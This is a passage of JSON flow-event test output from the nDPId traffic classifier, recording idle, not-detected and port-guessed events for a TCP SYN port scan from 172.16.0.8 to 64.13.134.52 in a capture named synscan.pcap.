-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1289,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":427,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1289,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":427,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1361,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":427,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1361,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":427,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6580,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6580,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6580,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6580,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00632{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056274,"flow_last_seen":1278275056274,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056274,"flow_last_seen":1278275056274,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1435,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2492,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1435,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2492,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1672,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":444,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1672,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":444,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00633{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1755,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":444,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1755,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":444,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1511,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2492,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1511,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2492,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":445,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SMBv23","breed":"Acceptable","category":"System"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":445,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SMBv23","breed":"Acceptable","category":"System"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1491,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2500,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1491,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1558,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2500,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1558,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":462,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":57797,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":462,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":57797,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":898,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4550,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":898,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4550,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":486,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":57797,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":486,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":57797,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":957,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4550,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":957,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4550,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8649,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8649,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1294,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060439,"flow_last_seen":1278275060439,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":458,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1294,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060439,"flow_last_seen":1278275060439,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":458,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8649,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8649,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1356,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":458,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1356,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":458,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":452,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8651,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":452,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8651,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1390,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":61900,"l4_proto":"tcp","ndpi": 